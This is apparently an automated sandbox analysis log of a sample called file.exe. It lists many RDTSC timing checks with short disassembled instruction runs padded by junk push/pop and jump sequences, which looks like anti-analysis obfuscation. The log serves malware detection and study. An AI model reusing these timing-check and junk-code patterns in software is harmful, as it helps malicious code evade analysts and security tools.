                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67BF7 second address: D67C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67C07 second address: D67C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4AC5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0D344F4AC5h 0x00000012 jmp 00007F0D344F4ABFh 0x00000017 jmp 00007F0D344F4AC2h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67C5E second address: D67C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AF02 second address: D6AF08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07F58 second address: D07F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EDB7 second address: D6EDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EDBF second address: D6EDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7083A second address: D70847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70847 second address: D7084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7084B second address: D70851 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70851 second address: D7087C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0D34B70907h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jl 00007F0D34B70900h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7087C second address: D708A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jg 00007F0D344F4AC3h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D708A2 second address: D708A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76AAA second address: D76AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75726 second address: D75740 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D34B70904h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75F9D second address: D75FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F0D344F4ABBh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jc 00007F0D344F4AB6h 0x0000001a je 00007F0D344F4AB6h 0x00000020 jmp 00007F0D344F4ABFh 0x00000025 popad 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push edi 0x0000002a pop edi 0x0000002b pushad 0x0000002c popad 0x0000002d push esi 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75FDD second address: D75FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75FE4 second address: D75FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75FEA second address: D75FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D762D8 second address: D762F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0D344F4AC9h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D762F6 second address: D76312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D34B70908h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76640 second address: D7664E instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7664E second address: D76671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007F0D34B70904h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F0D34B708F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFF959 second address: CFF95E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFF95E second address: CFF968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFF968 second address: CFF97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFF97A second address: CFF97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B29F second address: D7B2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F0D344F4ABEh 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B2B7 second address: D7B2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B56C second address: D7B599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0D344F4AC3h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F0D344F4AC1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BA23 second address: D7BA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F0D34B70906h 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BA41 second address: D7BA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C334 second address: D7C338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82194 second address: D821BD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F0D344F4AC7h 0x00000010 js 00007F0D344F4ABCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D821BD second address: D821CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F0D34B708F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81243 second address: D81249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81249 second address: D81275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0D34B708FEh 0x0000000c jc 00007F0D34B70918h 0x00000012 jmp 00007F0D34B708FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D813CB second address: D813E2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D344F4ABAh 0x00000008 pushad 0x00000009 js 00007F0D344F4AB6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8186A second address: D8186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8186E second address: D81872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81872 second address: D81880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 je 00007F0D34B708F6h 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D819AD second address: D819B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D819B1 second address: D819B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D819B5 second address: D819BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D819BB second address: D819C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D819C1 second address: D81A0D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D344F4AC8h 0x00000008 push edi 0x00000009 jmp 00007F0D344F4ABCh 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0D344F4AF8h 0x00000017 pushad 0x00000018 jmp 00007F0D344F4AC2h 0x0000001d push eax 0x0000001e pop eax 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81A0D second address: D81A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81A11 second address: D81A2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EEE3 second address: D2EEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81FF1 second address: D82005 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F0D344F4ABAh 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82005 second address: D82016 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D34B708FCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82016 second address: D8201C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8201C second address: D82022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8093F second address: D80964 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D344F4AC5h 0x0000000f jnl 00007F0D344F4AB6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46285 second address: D2E36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d ja 00007F0D34B708F6h 0x00000013 jmp 00007F0D34B70903h 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b mov edx, dword ptr [ebp+122D197Ch] 0x00000021 call dword ptr [ebp+122D30CFh] 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007F0D34B70901h 0x0000002e jmp 00007F0D34B70903h 0x00000033 jmp 00007F0D34B708FCh 0x00000038 popad 0x00000039 pushad 0x0000003a jmp 00007F0D34B70903h 0x0000003f pushad 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46761 second address: D46767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46767 second address: D46771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0D34B708F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A2D second address: D46A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A34 second address: D46A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A41 second address: D46A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46B7C second address: D46B86 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46B86 second address: D46BBC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D344F4ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F0D344F4ABCh 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F0D344F4ABBh 0x0000001b jng 00007F0D344F4ABCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D475F3 second address: D2EEE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dl, F4h 0x0000000c or dword ptr [ebp+122D2178h], eax 0x00000012 call dword ptr [ebp+1244A72Dh] 0x00000018 push edx 0x00000019 push eax 0x0000001a jg 00007F0D34B708F6h 0x00000020 pop eax 0x00000021 pop edx 0x00000022 jo 00007F0D34B70924h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0D34B708FAh 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89D9A second address: D89DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F0D344F4AC9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89F07 second address: D89F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A045 second address: D8A04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A04B second address: D8A050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A050 second address: D8A056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A1B2 second address: D8A1CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70905h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A480 second address: D8A484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A484 second address: D8A48E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D34B708F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A48E second address: D8A497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A497 second address: D8A4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A4A0 second address: D8A4C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jo 00007F0D344F4B08h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A4C9 second address: D8A4CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A4CF second address: D8A502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4AC2h 0x0000000d jmp 00007F0D344F4AC9h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8EC12 second address: D8EC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8EC16 second address: D8EC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AD6 second address: D91ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91ADE second address: D91B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F0D344F4AC2h 0x0000000b jmp 00007F0D344F4AC5h 0x00000010 pushad 0x00000011 jmp 00007F0D344F4AC9h 0x00000016 jmp 00007F0D344F4ABCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93CBC second address: D93CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96C12 second address: D96C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96C18 second address: D96C28 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D34B70902h 0x00000008 jne 00007F0D34B708F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96C28 second address: D96C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96C32 second address: D96C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AD22 second address: D9AD27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AD27 second address: D9AD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F346 second address: D9F350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D344F4AB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F490 second address: D9F4AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D34B708F6h 0x00000008 jmp 00007F0D34B708FCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F0D34B708FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F5DB second address: D9F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F5E5 second address: D9F5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FA01 second address: D9FA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007F0D344F4AC0h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0D344F4AC1h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FA33 second address: D9FA37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FE0 second address: D46FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FE4 second address: D46FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FEE second address: D46FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FF2 second address: D46FF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
